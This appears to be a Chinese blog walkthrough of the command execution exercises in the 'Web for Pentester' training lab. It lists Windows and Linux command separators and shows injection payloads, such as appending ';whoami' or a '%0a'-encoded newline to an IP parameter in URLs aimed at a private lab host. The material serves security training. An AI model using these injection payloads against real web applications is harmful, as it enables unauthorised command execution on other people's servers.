【渗透测试学习平台】 web for pentester -6.命令执行 - 走看看

zoukankan html css js c++ java

【渗透测试学习平台】 web for pentester -6.命令执行

命令执行漏洞

windows支持：

| ping 127.0.0.1|whoami || ping 2 || whoami （哪条名令为真执行那条）

& && ping 127.0.0.1&&whoami

Linux支持：

； 127.0.0.1;whoami

| 127.0.0.1|whoami 11 1||whoami （哪条名令为真执行那条）

&& 127.0.0.1&&whoami

Example 1

http://192.168.106.154/commandexec/example1.php?ip=127.0.0.1;whoami

Example 2

http://192.168.106.154/commandexec/example2.php?ip=127.0.0.1%0awhoami

Example 3

http://192.168.106.154/commandexec/example3.php?ip=127.0.0.1|whoami

关于我：一个网络安全爱好者，致力于分享原创高质量干货，欢迎关注我的个人微信公众号：Bypass--，浏览更多精彩文章。

查看全文

相关阅读:
Ubuntu 使用OpenCV 利用Makefile运行
 YOLOV3——PyTorch训练TensorFlowLite部署模型转换
 PyTorch——学习笔记
 opencv调用摄像头分辨率问题
 Dlib与Opencv中图像格式转换（matrix-Mat）
Windows下 VS2015 + Dlib + CUDA环境搭建
 OpenCV——银行卡识别
 QT入门
 LeetCode——最长连续回文串
 数值分析--第四章--特征值特征向量计算（乘幂法）

原文地址：https://www.cnblogs.com/xiaozi/p/7246016.html

Copyright © 2011-2022 走看看